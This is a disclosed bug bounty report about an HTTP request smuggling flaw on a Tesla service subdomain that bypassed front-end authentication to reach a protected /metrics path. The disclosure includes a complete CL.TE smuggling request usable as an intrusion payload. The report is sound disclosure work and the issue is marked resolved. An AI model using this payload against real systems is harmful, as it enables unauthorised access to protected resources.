Summary by riramar
The service under https://apm.ap.tesla.services is vulnerable to HTTP Request Smuggling allowing an attacker to bypass front-end security controls.
Authentication Bypass through HTTP Request Smuggling on https://apm.ap.tesla.services
Disclosed by riramar- Engagement Tesla
- Disclosed date almost 4 years ago
- Points 40
- Priority P3 Bugcrowd's VRT priority rating
- Status Resolved This vulnerability has been accepted and fixed
Report details
-
Submitted
-
Target Location
*.tesla.services -
Target category
Web App
-
VRT
Broken Authentication and Session Management > Authentication Bypass -
Priority
P3 -
Bug URL
https://apm.ap.tesla.services/metrics -
Description
The service under https://apm.ap.tesla.services is vulnerable to HTTP Request Smuggling allowing an attacker to bypass front-end security controls.
As PoC I'm using the URL https://apm.ap.tesla.services/metrics which returns 401 (Unauthorized) when you access it.By performing the Burp Intruder attack below with the CLTE payload an attacker can bypass the front-end and access https://apm.ap.tesla.services/metrics.
Notice the path /metrics is just an example. Any protected resource using the same security controls can be exploited in the same way.
Please check the video attached (apm.ap.tesla.services-poc.mp4) for reference to reproduce and I'm providing the Burp Intruder payload below. -
HTTP request
POST /?cb=906971031432954 HTTP/1.1 Transfer-Encoding : chunked Host: apm.ap.tesla.services Connection: keep-alive ID: §0§ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36 Content-type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 65 1 Z 0 GET /metrics HTTP/1.1 Host: apm.ap.tesla.services 0